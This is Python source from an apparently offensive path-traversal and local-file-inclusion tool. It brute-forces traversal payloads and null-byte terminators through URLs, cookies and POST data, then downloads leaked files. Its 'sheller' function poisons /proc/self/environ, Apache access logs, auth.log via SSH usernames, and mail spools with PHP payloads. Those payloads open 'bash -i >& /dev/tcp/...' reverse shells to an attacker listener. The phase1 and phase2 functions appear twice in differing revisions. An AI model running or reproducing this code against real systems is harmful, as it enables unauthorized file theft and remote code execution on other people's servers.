def phase1(attack, url, url2, keyword, cookie, selected, verbose, depth, paylist, file, authcookie, postdata, gui): #variables for the progress counter global requestcount #totalrequests = len(paylist) * (len(nullchars) + 1) * depth totalrequests = len(payloadlist) * (len(nullchars) + 1) * (depth) timeout = vars.timeout if gui: lock.acquire() try: gui.progressBar.reset() gui.progressBar.setMinimum(0) gui.progressBar.setMaximum(totalrequests) finally: lock.release() #resolve issues with inpath attack if not url.endswith("/"): url += "/" #initialize lists & session payloads = [] nullbytes = [] s = session() if authcookie != "": tmpjar = cookieFromFile(authcookie) for cookie in tmpjar: s.cookies.set_cookie(cookie) #initial ping for filecheck if attack != 4: try: con2 = s.get(url, timeout=timeout).content except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): sys.exit("Timeout on initial check.") else: try: con2 = s.post(url, data={}, timeout=timeout).content except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): sys.exit("Timeout on initial check.") con3 = None if attack == 1: try: con3 = s.get(url + "?" + keyword + "=vailyn" + url2, timeout=timeout).content except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): sys.exit("Timeout on initial check.") for i in paylist: d = 1 while d <= depth: traverse = '' j = 1 #chain traversal payloads while j <= d: traverse += i j += 1 #send attack requests - no nullbyte injection requestlist = [] if attack == 1: prep, p = query(traverse, "", file, "", keyword, url, url2, s) try: random_ua(s) r = s.send(prep, timeout=timeout) except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): print("Timeout reached for " + url) continue elif attack == 2: prep, p = inpath(traverse, "", file, "", url, url2, s) try: random_ua(s) r = s.send(prep, timeout=timeout) except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): print("Timeout reached for " + url) continue elif attack == 3: s.cookies.set(selected, traverse + file) p = traverse + file try: random_ua(s) r = s.get(url, timeout=timeout) except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): print("Timeout reached for " + url) continue elif attack == 4: p = traverse + file data = {} for prop in postdata.split("&"): pair = prop.split("=") if pair[1].strip() == "INJECT": pair[1] = p data[pair[0].strip()] = pair[1].strip() assert data != {} try: random_ua(s) r = s.post(url, data=data, timeout=timeout) except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): print("Timeout reached for " + url) continue requestlist.append((r, p, "")) #repeat for nullbytes for nb in nullchars: if attack == 1: prep, p = query(traverse, "", file, nb, keyword, url, url2, s) try: random_ua(s) r = s.send(prep, timeout=timeout) except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): print("Timeout reached for " + url) continue elif attack == 2: prep, p = inpath(traverse, "", file, nb, url, url2, s) try: random_ua(s) r = s.send(prep, timeout=timeout) except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): print("Timeout reached for " + url) continue elif attack == 3: s.cookies.set(selected, traverse + file + nb) p = traverse + file + nb try: random_ua(s) r = s.get(url, timeout=timeout) except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): print("Timeout reached for " + url) continue elif attack == 4: p = traverse + file + nb data = {} for prop in postdata.split("&"): pair = prop.split("=") if pair[1].strip() == "INJECT": pair[1] = p data[pair[0].strip()] = pair[1].strip() assert data != {} try: random_ua(s) r = s.post(url, data=data, timeout=timeout) except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): print("Timeout reached for " + url) continue requestlist.append((r, p, nb)) #analyze result found = False for (r, p, nb) in requestlist: lock.acquire() try: requestcount += 1 if gui: progressgui(requestcount, totalrequests, gui) else: if sys.platform.lower().startswith('win'): if requestcount % 1000 == 0: progresswin(requestcount, totalrequests, prefix=" ", suffix=" ") else: progress(requestcount, totalrequests, prefix=" ", suffix=" ") finally: lock.release() if str(r.status_code).startswith("2"): if filecheck( r, con2, con3, p) and attack != 4 or filecheck( r, con2, con3, p, post=True) and attack == 4: payloads.append(i) if nb != "": nullbytes.append(nb) found = True out = color.RD + "[pl]" + color.END + color.O + " " + str( r.status_code) + color.END + " " out = out + "{0:{1}}".format(i, maxlen) + " " + nb print(out) if verbose and not found: if attack == 1 or attack == 2: print(color.END + "{}|: ".format(r.status_code) + r.url) elif attack == 3 or attack == 4: print(color.END + "{}|: ".format(r.status_code) + r.url + " : " + p) d += 1 if found: break return (payloads, nullbytes)
def phase2(attack, url, url2, keyword, cookie, selected, filespath, dirs, depth, verbose, dl, selected_payloads, selected_nullbytes, authcookie, postdata, dirlen, gui): #variables for the progress counter global requestcount timeout = vars.timeout fileslen = sum(1 for dummy in filegen(filespath)) if len(selected_nullbytes) == 0: totalrequests = len(selected_payloads) * fileslen * dirlen * depth else: totalrequests = len(selected_payloads) * len( selected_nullbytes) * fileslen * dirlen * depth if gui: lock.acquire() try: gui.progressBar.reset() gui.progressBar.setMinimum(0) gui.progressBar.setMaximum(totalrequests) finally: lock.release() #resolve issues with inpath attack and loot function if not url.endswith("/"): url += "/" #initialize lists & session found = [] urls = [] s = session() if authcookie != "": tmpjar = cookieFromFile(authcookie) for cookie in tmpjar: s.cookies.set_cookie(cookie) #initial ping for filecheck if attack != 4: try: con2 = s.get(url, timeout=timeout).content except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): sys.exit("Timeout on initial check.") else: try: con2 = s.post(url, data={}, timeout=timeout).content except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): sys.exit("Timeout on initial check.") con3 = None if attack == 1: try: con3 = s.get(url + "?" + keyword + "=vailyn" + url2, timeout=timeout).content except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): sys.exit("Timeout on initial check.") try: for dir in dirs: files = filegen(filespath) for file in files: d = 1 while d <= depth: for i in selected_payloads: traverse = '' j = 1 #chain traversal payloads while j <= d: traverse += i j += 1 #send attack requests - with or without nullbyte injection requestlist = [] if selected_nullbytes == []: data = {} if attack == 1: prep, p = query(traverse, dir, file, "", keyword, url, url2, s) try: random_ua(s) r = s.send(prep, timeout=timeout) except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): print("Timeout reached for " + url) continue elif attack == 2: prep, p = inpath(traverse, dir, file, "", url, url2, s) try: random_ua(s) r = s.send(prep, timeout=timeout) except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): print("Timeout reached for " + url) continue elif attack == 3: p = traverse + dir + file s.cookies.set(selected, traverse + dir + file) try: random_ua(s) r = s.get(url, timeout=timeout) except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): print("Timeout reached for " + url) continue #print(s.cookies) elif attack == 4: p = traverse + dir + file for prop in postdata.split("&"): pair = prop.split("=") if pair[1].strip() == "INJECT": pair[1] = p data[pair[0].strip()] = pair[1].strip() assert data != {} try: random_ua(s) r = s.post(url, data=data, timeout=timeout) except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): print("Timeout reached for " + url) continue requestlist.append((r, p, data)) else: for nb in selected_nullbytes: data = {} if attack == 1: prep, p = query(traverse, dir, file, nb, keyword, url, url2, s) try: random_ua(s) r = s.send(prep, timeout=timeout) except (requests.exceptions.Timeout, requests.exceptions.ConnectionError ): print("Timeout reached for " + url) continue elif attack == 2: prep, p = inpath(traverse, dir, file, nb, url, url2, s) try: random_ua(s) r = s.send(prep, timeout=timeout) except (requests.exceptions.Timeout, requests.exceptions.ConnectionError ): print("Timeout reached for " + url) continue elif attack == 3: p = traverse + dir + file + nb s.cookies.set(selected, traverse + dir + file + nb) try: random_ua(s) r = s.get(url, timeout=timeout) except (requests.exceptions.Timeout, requests.exceptions.ConnectionError ): print("Timeout reached for " + url) continue elif attack == 4: p = traverse + dir + file + nb for prop in postdata.split("&"): pair = prop.split("=") if pair[1].strip() == "INJECT": pair[1] = p data[pair[0].strip()] = pair[1].strip() assert data != {} try: random_ua(s) r = s.post(url, data=data, timeout=timeout) except (requests.exceptions.Timeout, requests.exceptions.ConnectionError ): print("Timeout reached for " + url) continue requestlist.append((r, p, data)) #analyze result for (r, p, data) in requestlist: lock.acquire() try: requestcount += 1 if gui: progressgui(requestcount, totalrequests, gui) else: if sys.platform.lower().startswith('win'): if requestcount % 1000 == 0: progresswin(requestcount, totalrequests, prefix=" ", suffix=" ") else: progress(requestcount, totalrequests, prefix=" ", suffix=" ") finally: lock.release() vfound = False if str(r.status_code).startswith("2"): if filecheck(r, con2, con3, p) and attack != 4 or filecheck( r, con2, con3, p, post=True) and attack == 4: vfound = True if attack == 1 or attack == 2: print(color.RD + "[INFO]" + color.O + " leak" + color.END + " " + color.RD + "statvs-code" + color.END + "=" + color.O + str(r.status_code) + color.END + " " + color.R + "site" + color.END + "=" + r.url) if dl and dir + file not in found: download(r.url, dir + file, cookie=s.cookies) found.append(dir + file) if attack == 1: urls.append(color.RD + "[pl]" + color.END + color.O + " " + str(r.status_code) + color.END + " " + r.url.split(keyword + "=") [1].replace(url2, "")) else: vlnlist = r.url.split("/")[1::] vlnpath = ("/".join( i for i in vlnlist)).replace( url2, "") urls.append(color.RD + "[pl]" + color.END + color.O + " " + str(r.status_code) + color.END + " " + vlnpath) elif attack == 3: s.cookies.set(selected, p) print(color.RD + "[INFO]" + color.O + " leak" + color.END + " " + color.RD + "statvs-code" + color.END + "=" + color.O + str(r.status_code) + color.END + " " + color.R + "cookie" + color.END + "=" + p) if dl and dir + file not in found: download(r.url, dir + file, cookie=s.cookies) found.append(dir + file) urls.append(color.RD + "[pl]" + color.END + color.O + " " + str(r.status_code) + color.END + " " + p) elif attack == 4: print(color.RD + "[INFO]" + color.O + " leak" + color.END + " " + color.RD + "statvs-code" + color.END + "=" + color.O + str(r.status_code) + color.END + " " + color.R + "postdata" + color.END + "=" + p) if dl and dir + file not in found: download(r.url, dir + file, cookie=s.cookies, post=data) found.append(dir + file) urls.append(color.RD + "[pl]" + color.END + color.O + " " + str(r.status_code) + color.END + " " + p) if verbose and not vfound: if attack == 1 or attack == 2: print(color.END + "{}|: ".format(r.status_code) + r.url) elif attack == 3 or attack == 4: print(color.END + "{}|: ".format(r.status_code) + r.url + " : " + p) d += 1 return (found, urls) except KeyboardInterrupt: return (found, urls)
def sheller(technique, attack, url, url2, keyword, cookie, selected, verbose, paylist, nullist, authcookie, postdata): #resolve issues with inpath attack if not url.endswith("/"): url += "/" s = session() timeout = vars.timeout depth = 10 if technique == 1: file = "/proc/self/environ" elif technique == 2: file = "/var/log/apache2/access.log" elif technique == 3: file = "/var/log/auth.log" elif technique == 4: file = "/var/mail/www-data" success = None if authcookie != "": tmpjar = cookieFromFile(authcookie) for cookie in tmpjar: s.cookies.set_cookie(cookie) #initial ping for filecheck if attack != 4: try: con2 = s.get(url, timeout=timeout).content except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): sys.exit("Timeout on initial check.") else: try: con2 = s.post(url, data={}, timeout=timeout).content except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): sys.exit("Timeout on initial check.") con3 = None if attack == 1: try: con3 = s.get(url + "?" + keyword + "=vailyn" + url2, timeout=timeout).content except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): sys.exit("Timeout on initial check.") for i in paylist: d = 1 while d <= depth: traverse = '' j = 1 #chain traversal payloads while j <= d: traverse += i j += 1 #send attack requests - no nullbyte injection requestlist = [] if nullist == []: data = {} if attack == 1: prep, p = query(traverse, "", file, "", keyword, url, url2, s) try: random_ua(s) r = s.send(prep, timeout=timeout) except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): print("Timeout reached for " + url) continue elif attack == 2: prep, p = inpath(traverse, "", file, "", url, url2, s) try: random_ua(s) r = s.send(prep, timeout=timeout) except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): print("Timeout reached for " + url) continue elif attack == 3: s.cookies.set(selected, traverse + file) p = traverse + file try: random_ua(s) r = s.get(url, timeout=timeout) except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): print("Timeout reached for " + url) continue elif attack == 4: p = traverse + file for prop in postdata.split("&"): pair = prop.split("=") if pair[1].strip() == "INJECT": pair[1] = p data[pair[0].strip()] = pair[1].strip() assert data != {} try: random_ua(s) r = s.post(url, data=data, timeout=timeout) except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): print("Timeout reached for " + url) continue requestlist.append((r, p, "", data, traverse)) else: for nb in nullist: data = {} if attack == 1: prep, p = query(traverse, "", file, "", keyword, url, url2, s) try: random_ua(s) r = s.send(prep, timeout=timeout) except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): print("Timeout reached for " + url) continue elif attack == 2: prep, p = inpath(traverse, "", file, "", url, url2, s) try: random_ua(s) r = s.send(prep, timeout=timeout) except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): print("Timeout reached for " + url) continue elif attack == 3: s.cookies.set(selected, traverse + file) p = traverse + file try: random_ua(s) r = s.get(url, timeout=timeout) except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): print("Timeout reached for " + url) continue elif attack == 4: p = traverse + file for prop in postdata.split("&"): pair = prop.split("=") if pair[1].strip() == "INJECT": pair[1] = p data[pair[0].strip()] = pair[1].strip() assert data != {} try: random_ua(s) r = s.post(url, data=data, timeout=timeout) except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): print("Timeout reached for " + url) continue requestlist.append((r, p, "", data, traverse)) #analyze result found = False for (r, p, nb, data, traverse) in requestlist: if attack == 3: s.cookies.set(selected, p) if str(r.status_code).startswith("2"): if filecheck( r, con2, con3, p) and attack != 4 or filecheck( r, con2, con3, p, post=True) and attack == 4: success = (r, p, nb, data, traverse) found = True break if verbose: if attack == 1 or attack == 2: print(color.END + "{}|: ".format(r.status_code) + r.url) elif attack == 3 or attack == 4: print(color.END + "{}|: ".format(r.status_code) + r.url + " : " + p) d += 1 if found: break if success: if attack == 1: prep = query(success[4], "", file, success[2], keyword, url, url2, s)[0] elif attack == 2: prep = inpath(success[4], "", file, success[2], url, url2, s)[0] elif attack == 3: s.cookies.set(selected, success[1]) req = requests.Request(method='GET', url=url) prep = s.prepare_request(req) elif attack == 4: req = requests.Request(method='POST', url=url, data=success[3]) prep = s.prepare_request(req) if technique == 1: prep.headers[ 'User-agent'] = '<?php system("bash -i >& /dev/tcp/{}/{} 0>&1"); ?>'.format( LISTENIP, LISTENPORT) try: s.send(prep, timeout=timeout) except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): print("Timeout reached @technique 1") prep.headers[ 'User-agent'] = '<?php exec("bash -i >& /dev/tcp/{}/{} 0>&1"); ?>'.format( LISTENIP, LISTENPORT) try: s.send(prep, timeout=timeout) except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): print("Timeout reached @technique 1") prep.headers[ 'User-agent'] = '<?php passthru("bash -i >& /dev/tcp/{}/{} 0>&1"); ?>'.format( LISTENIP, LISTENPORT) try: s.send(prep, timeout=timeout) except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): print("Timeout reached @technique 1") elif technique == 2: req = requests.Request(method='GET', url=url) prep2 = s.prepare_request(req) prep2.url = url + "/" + '<?php system("bash -i >& /dev/tcp/{}/{} 0>&1"); ?>'.format( LISTENIP, LISTENPORT) try: s.send(prep2, timeout=timeout) except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): print("Timeout reached @technique 2") prep2.url = url + "/" + '<?php exec("bash -i >& /dev/tcp/{}/{} 0>&1"); ?>'.format( LISTENIP, LISTENPORT) try: s.send(prep2, timeout=timeout) except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): print("Timeout reached @technique 2") prep2.url = url + "/" + '<?php passthru("bash -i >& /dev/tcp/{}/{} 0>&1"); ?>'.format( LISTENIP, LISTENPORT) try: s.send(prep2, timeout=timeout) except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): print("Timeout reached @technique 2") try: s.send(prep, timeout=timeout) except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): print("Timeout reached @technique 2") elif technique == 3: tmp = url.split("://")[1] if "@" in tmp: tmp = tmp.split("@")[1] host = tmp.split("/")[0].split(":")[0] sshs = [ '<?php system("bash -i >& /dev/tcp/{}/{} 0>&1"); ?>@{}'.format( LISTENIP, LISTENPORT, host), '<?php exec("bash -i >& /dev/tcp/{}/{} 0>&1"); ?>@{}'.format( LISTENIP, LISTENPORT, host), '<?php passthru("bash -i >& /dev/tcp/{}/{} 0>&1"); ?>@{}'. format(LISTENIP, LISTENPORT, host) ] for ssh in sshs: try: if sys.platform.lower().startswith("win"): subprocess.run(["putty.exe", "-ssh", ssh]) else: subprocess.run(["ssh", ssh]) except Exception as e: print("Technique " + technique + " failed: {}".format(e)) try: s.send(prep, timeout=timeout) except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): print("Timeout reached @technique 3") elif technique == 4: tmp = url.split("://")[1] if "@" in tmp: tmp = tmp.split("@")[1] topics = [ 'I<3shells <?php system("bash -i >& /dev/tcp/{}/{} 0>&1"); ?>'. format(LISTENIP, LISTENPORT), 'I<3shells <?php exec("bash -i >& /dev/tcp/{}/{} 0>&1"); ?>'. format(LISTENIP, LISTENPORT), 'I<3shells <?php passthru("bash -i >& /dev/tcp/{}/{} 0>&1"); ?>' .format(LISTENIP, LISTENPORT) ] host = tmp.split("/")[0].split(":")[0] for topic in topics: try: p = subprocess.Popen(["echo", "Uno reverse shell"], stdout=subprocess.PIPE) subprocess.call( ["mail", "-s", topic, "www-data@{}".format(host)], stdin=p.stdout) except Exception as e: print("Technique " + technique + " failed: {}".format(e)) try: s.send(prep, timeout=timeout) except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): print("Timeout reached @technique 4")
def phase1(attack, url, url2, keyword, cookie, selected, verbose, depth, paylist, file, authcookie, postdata, gui): """ [Phase 1]: Vulnerability Analysis @params: attack - attack mode (-a ACK) url - target part 1 (-v VIC) url2 - target part 2 (-q VIC2) keyword - -p PAM (only for -a 1) cookie - cookiejar for -a 3 selected - selected cookie to be poisoned verbose - print 404s? depth - attack depth (-d INT) paylist - payload list (all) file - file to be looked up (-i FIL, default: /etc/passwd) authcookie - Authentication Cookie File to bypass Login Screens postdata - POST Data for --attack 4 gui - GUI frame to set the graphical progress bar """ # variables for the progress counter global requestcount totalrequests = len(payloadlist) * (len(nullchars) + 1) * (depth) timeout = vars.timeout if gui: lock.acquire() try: gui.progressBar.reset() gui.progressBar.setMinimum(0) gui.progressBar.setMaximum(totalrequests) finally: lock.release() # resolve issues with inpath attack if attack == 2: # only root directory, else false positives splitted = url.split("://") ulist = splitted[1].split("/") last = ulist[-1] # delete file, but not hidden directory if "." in last and not last.startswith(".") and last != ulist[0]: del ulist[-1] url = splitted[0] + "://" + "/".join(ulist) if not url.endswith("/"): url += "/" # initialize lists & session payloads = [] nullbytes = [] s = session() if authcookie != "": tmpjar = cookieFromFile(authcookie) for cookie in tmpjar: s.cookies.set_cookie(cookie) # initial ping for filecheck if attack != 4: try: con2 = s.get(url, timeout=timeout).content except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): sys.exit("Timeout on initial check.") else: try: con2 = s.post(url, data={}, timeout=timeout).content except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): sys.exit("Timeout on initial check.") con3 = None if attack == 1: try: con3 = s.get(url + "?" + keyword + "=vailyn" + url2, timeout=timeout).content except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): sys.exit("Timeout on initial check.") for i in paylist: d = 1 while d <= depth: traverse = '' j = 1 # chain traversal payloads while j <= d: traverse += i j += 1 # send attack requests - no nullbyte injection requestlist = [] if attack == 1: prep, p = query(traverse, "", file, "", keyword, url, url2, s) try: random_ua(s) r = s.send(prep, timeout=timeout) except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): print("Timeout reached for " + url) elif attack == 2: prep, p = inpath(traverse, "", file, "", url, url2, s) try: random_ua(s) r = s.send(prep, timeout=timeout) except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): print("Timeout reached for " + url) elif attack == 3: s.cookies.set(selected, traverse + file) p = traverse + file try: random_ua(s) r = s.get(url, timeout=timeout) except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): print("Timeout reached for " + url) elif attack == 4: p = traverse + file data = {} for prop in postdata.split("&"): pair = prop.split("=") if pair[1].strip() == "INJECT": pair[1] = p data[pair[0].strip()] = pair[1].strip() assert data != {} try: random_ua(s) req = requests.Request(method='POST', url=url, data=data) prep = s.prepare_request(req) newBody = unquote(prep.body) prep.body = newBody prep.headers["content-length"] = len(newBody) r = s.send(prep, timeout=timeout) except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): print("Timeout reached for " + url) try: requestlist.append((r, p, "")) except Exception: pass # repeat for nullbytes for nb in nullchars: if attack == 1: prep, p = query(traverse, "", file, nb, keyword, url, url2, s) try: random_ua(s) r = s.send(prep, timeout=timeout) except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): print("Timeout reached for " + url) continue elif attack == 2: prep, p = inpath(traverse, "", file, nb, url, url2, s) try: random_ua(s) r = s.send(prep, timeout=timeout) except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): print("Timeout reached for " + url) continue elif attack == 3: s.cookies.set(selected, traverse + file + nb) p = traverse + file + nb try: random_ua(s) r = s.get(url, timeout=timeout) except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): print("Timeout reached for " + url) continue elif attack == 4: p = traverse + file + nb data = {} for prop in postdata.split("&"): pair = prop.split("=") if pair[1].strip() == "INJECT": pair[1] = p data[pair[0].strip()] = pair[1].strip() assert data != {} try: random_ua(s) req = requests.Request(method='POST', url=url, data=data) prep = s.prepare_request(req) newBody = unquote(prep.body) prep.body = newBody prep.headers["content-length"] = len(newBody) r = s.send(prep, timeout=timeout) except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): print("Timeout reached for " + url) continue try: requestlist.append((r, p, nb)) except Exception: pass # analyze result found = False for (r, p, nb) in requestlist: lock.acquire() try: requestcount += 1 if gui: progressgui(requestcount, totalrequests, gui) else: if sys.platform.lower().startswith('win'): if requestcount % 1000 == 0: progresswin(requestcount, totalrequests, prefix=" ", suffix=" ") else: progress(requestcount, totalrequests, prefix=" ", suffix=" ") finally: lock.release() if str(r.status_code).startswith("2"): if filecheck( r, con2, con3, p) and attack != 4 or filecheck( r, con2, con3, p, post=True) and attack == 4: payloads.append(i) if nb != "": nullbytes.append(nb) found = True out = color.RD + "[pl]" + color.END + color.O + " " + str( r.status_code) + color.END + " " out = out + "{0:{1}}".format(i, maxlen) + " " + nb print(out) if verbose and not found: if attack == 1 or attack == 2: print(color.END + "{}|: ".format(r.status_code) + r.url) elif attack == 3 or attack == 4: print(color.END + "{}|: ".format(r.status_code) + r.url + " : " + p) d += 1 if found: break return (payloads, nullbytes)
def phase2(attack, url, url2, keyword, cookie, selected, filespath, dirs, depth, verbose, dl, selected_payloads, selected_nullbytes, authcookie, postdata, dirlen, gui): """ [Phase 2]: Exploitation @params: attack - attack mode (-a ACK) url - target part 1 (-v VIC) url2 - target part 2 (-q VIC2) keyword - -p PAM (only for -a 1) cookie - cookiejar for -a 3 selected - selected cookie to be poisoned files - file list created from -l FIL ... dirs - directory list (permutation level based on -d INT) depth - attack depth (-d INT) verbose - print 404s? dl - download found files? selected_payloads - payloads selected in phase 1 selected_nullbytes - terminators selected in phase 1 authcookie - Authentication Cookie File to bypass Login Screens postdata - POST Data for --attack 4 dirlen - total directory dictionary size (after permutations) gui - GUI frame to set the graphical progress bar """ # variables for the progress counter global requestcount timeout = vars.timeout fileslen = sum(1 for dummy in filegen(filespath)) if len(selected_nullbytes) == 0: totalrequests = len(selected_payloads) * fileslen * dirlen * depth else: totalrequests = len(selected_payloads) * len( selected_nullbytes) * fileslen * dirlen * depth if gui: lock.acquire() try: gui.progressBar.reset() gui.progressBar.setMinimum(0) gui.progressBar.setMaximum(totalrequests) finally: lock.release() # resolve issues with inpath attack and loot function if attack == 2: # only root directory, else false positives splitted = url.split("://") ulist = splitted[1].split("/") last = ulist[-1] # delete file, but not hidden directory if "." in last and not last.startswith(".") and last != ulist[0]: del ulist[-1] url = splitted[0] + "://" + "/".join(ulist) if not url.endswith("/"): url += "/" # initialize lists & session found = [] urls = [] s = session() if authcookie != "": tmpjar = cookieFromFile(authcookie) for cookie in tmpjar: s.cookies.set_cookie(cookie) # initial ping for filecheck if attack != 4: try: con2 = s.get(url, timeout=timeout).content except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): sys.exit("Timeout on initial check.") else: try: con2 = s.post(url, data={}, timeout=timeout).content except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): sys.exit("Timeout on initial check.") con3 = None if attack == 1: try: con3 = s.get(url + "?" + keyword + "=vailyn" + url2, timeout=timeout).content except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): sys.exit("Timeout on initial check.") try: for dir in dirs: files = filegen(filespath) for file in files: d = 1 while d <= depth: for i in selected_payloads: traverse = '' j = 1 # chain traversal payloads while j <= d: traverse += i j += 1 # send attack requests - with or without nullbyte injection requestlist = [] if selected_nullbytes == []: data = {} if attack == 1: prep, p = query(traverse, dir, file, "", keyword, url, url2, s) try: random_ua(s) r = s.send(prep, timeout=timeout) except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): print("Timeout reached for " + url) continue elif attack == 2: prep, p = inpath(traverse, dir, file, "", url, url2, s) try: random_ua(s) r = s.send(prep, timeout=timeout) except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): print("Timeout reached for " + url) continue elif attack == 3: p = traverse + dir + file s.cookies.set(selected, traverse + dir + file) try: random_ua(s) r = s.get(url, timeout=timeout) except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): print("Timeout reached for " + url) continue elif attack == 4: p = traverse + dir + file for prop in postdata.split("&"): pair = prop.split("=") if pair[1].strip() == "INJECT": pair[1] = p data[pair[0].strip()] = pair[1].strip() assert data != {} try: random_ua(s) req = requests.Request(method='POST', url=url, data=data) prep = s.prepare_request(req) newBody = unquote(prep.body) prep.body = newBody prep.headers["content-length"] = len( newBody) r = s.send(prep, timeout=timeout) except (requests.exceptions.Timeout, requests.exceptions.ConnectionError): print("Timeout reached for " + url) continue try: requestlist.append((r, p, data)) except Exception: pass else: for nb in selected_nullbytes: data = {} if attack == 1: prep, p = query(traverse, dir, file, nb, keyword, url, url2, s) try: random_ua(s) r = s.send(prep, timeout=timeout) except (requests.exceptions.Timeout, requests.exceptions.ConnectionError ): print("Timeout reached for " + url) continue elif attack == 2: prep, p = inpath(traverse, dir, file, nb, url, url2, s) try: random_ua(s) r = s.send(prep, timeout=timeout) except (requests.exceptions.Timeout, requests.exceptions.ConnectionError ): print("Timeout reached for " + url) continue elif attack == 3: p = traverse + dir + file + nb s.cookies.set(selected, traverse + dir + file + nb) try: random_ua(s) r = s.get(url, timeout=timeout) except (requests.exceptions.Timeout, requests.exceptions.ConnectionError ): print("Timeout reached for " + url) continue elif attack == 4: p = traverse + dir + file + nb for prop in postdata.split("&"): pair = prop.split("=") if pair[1].strip() == "INJECT": pair[1] = p data[pair[0].strip()] = pair[1].strip() assert data != {} try: random_ua(s) req = requests.Request(method='POST', url=url, data=data) prep = s.prepare_request(req) newBody = unquote(prep.body) prep.body = newBody prep.headers["content-length"] = len( newBody) r = s.send(prep, timeout=timeout) except (requests.exceptions.Timeout, requests.exceptions.ConnectionError ): print("Timeout reached for " + url) continue try: requestlist.append((r, p, data)) except Exception: pass # analyze result for (r, p, data) in requestlist: lock.acquire() try: requestcount += 1 if gui: progressgui(requestcount, totalrequests, gui) else: if sys.platform.lower().startswith('win'): if requestcount % 1000 == 0: progresswin(requestcount, totalrequests, prefix=" ", suffix=" ") else: progress(requestcount, totalrequests, prefix=" ", suffix=" ") finally: lock.release() vfound = False if str(r.status_code).startswith("2"): if (filecheck(r, con2, con3, p) and attack != 4 or filecheck(r, con2, con3, p, post=True) and attack == 4): vfound = True if attack == 1 or attack == 2: print(color.RD + "[INFO]" + color.O + " leak" + color.END + " " + color.RD + "statvs-code" + color.END + "=" + color.O + str(r.status_code) + color.END + " " + color.R + "site" + color.END + "=" + r.url) if dl and dir + file not in found: download(r.url, dir + file, cookie=s.cookies) found.append(dir + file) if attack == 1: urls.append(color.RD + "[pl]" + color.END + color.O + " " + str(r.status_code) + color.END + " " + r.url.split(keyword + "=") [1].replace(url2, "")) else: vlnlist = r.url.split("/")[1::] vlnpath = ("/".join( i for i in vlnlist)).replace( url2, "") urls.append(color.RD + "[pl]" + color.END + color.O + " " + str(r.status_code) + color.END + " " + vlnpath) elif attack == 3: s.cookies.set(selected, p) print(color.RD + "[INFO]" + color.O + " leak" + color.END + " " + color.RD + "statvs-code" + color.END + "=" + color.O + str(r.status_code) + color.END + " " + color.R + "cookie" + color.END + "=" + p) if dl and dir + file not in found: download(r.url, dir + file, cookie=s.cookies) found.append(dir + file) urls.append(color.RD + "[pl]" + color.END + color.O + " " + str(r.status_code) + color.END + " " + p) elif attack == 4: print(color.RD + "[INFO]" + color.O + " leak" + color.END + " " + color.RD + "statvs-code" + color.END + "=" + color.O + str(r.status_code) + color.END + " " + color.R + "postdata" + color.END + "=" + p) if dl and dir + file not in found: download(r.url, dir + file, cookie=s.cookies, post=data) found.append(dir + file) urls.append(color.RD + "[pl]" + color.END + color.O + " " + str(r.status_code) + color.END + " " + p) if verbose and not vfound: if attack == 1 or attack == 2: print(color.END + "{}|: ".format(r.status_code) + r.url) elif attack == 3 or attack == 4: print(color.END + "{}|: ".format(r.status_code) + r.url + " : " + p) d += 1 return (found, urls) except KeyboardInterrupt: return (found, urls)
